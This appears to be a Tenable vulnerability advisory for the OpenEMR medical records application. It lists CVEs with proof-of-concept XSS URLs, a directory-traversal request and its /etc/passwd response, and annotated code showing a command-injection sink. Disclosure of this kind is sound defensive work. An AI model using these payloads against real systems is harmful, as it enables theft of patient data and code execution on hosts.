OpenEMR Multiple Vulnerabilities

Tenable researchers have discovered a number of flaws in OpenEMR - a popular, open-source medical records application. These flaws, detailed below, could allow attackers to obtain sensitive patient data or possibly execute arbitrary code on the host system.

XSS - controller.php - patient_id parameter - CVE-2019-3963

controller.php is vulnerable to a reflected cross-site scripting attack via the patient_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.

Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0"><script>alert("XSS")</script>&document_id=

XSS - controller.php - doc_id parameter - CVE-2019-3964

controller.php is vulnerable to a reflected cross-site scripting attack via the doc_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.

Proof of concept: http://<openemr host>/controller.php?document&view&patient_id=0&doc_id=0"><script>alert("XSS")</script>

XSS - controller.php - document_id parameter - CVE-2019-3965

controller.php is vulnerable to a reflected cross-site scripting attack via the document_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.

Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0&document_id=1"><script>alert("XSS")</script>

XSS - controller.php - foreign_id parameter - CVE-2019-3966

controller.php is vulnerable to a reflected cross-site scripting attack via the foreign_id parameter (POST request). This could allow an attacker to execute arbitrary code in the context of the current user's session.

Directory Traversal and Arbitrary File Download - Patient File Downloads - CVE-2019-3967

A vulnerability exists in the patient file download interface that allowed authenticated users to download arbitrary files from the host system. This could allow an attacker to obtain sensitive patient information.

Proof of concept request:

POST /interface/patient_file/download_template.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/controller.php?document&upload&patient_id=0&parent_id=1&
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Connection: close
Cookie: OpenEMR=ac4ac95557810d61c49af51436209596
Upgrade-Insecure-Requests: 1

patient_id=0&form_filename=../../../../../../../../../../../etc/passwd

Response:

HTTP/1.1 200 OK
Date: Tue, 16 Apr 2019 15:00:22 GMT
Server: Apache/2.4.34 (Unix)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="passwd_Doe_2."
Content-Length: 1271
Connection: close
Content-Type: application/octet-stream

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
apache:x:100:101:apache:/var/www:/sbin/nologin

Command Injection via /contrib/forms/scanned_notes/new.php - CVE-2019-3968

Unlike other uses of "exec" / "system" / "passthru" / etc., this form does not properly escape commands sent to the host OS, which allows for command injection via an authenticated user that has access to the scanned notes form. $formid is influenced directly by the user and passed directly into the commands executed later in the script. This could allow an attacker to inject arbitrary commands to be executed on the host system.

$formid = $_GET['id'];

...

$imagepath = "$imagedir/${encounter}_$formid.jpg";
                                     ^____ user controlled value

...

$cmd = "convert -density 96 '$tmp_name' '$imagepath'";
                                         ^____ Still contains user controlled value with no sanitation

...

$tmp0 = exec($cmd, $tmp1, $tmp2);
             ^___ command is executed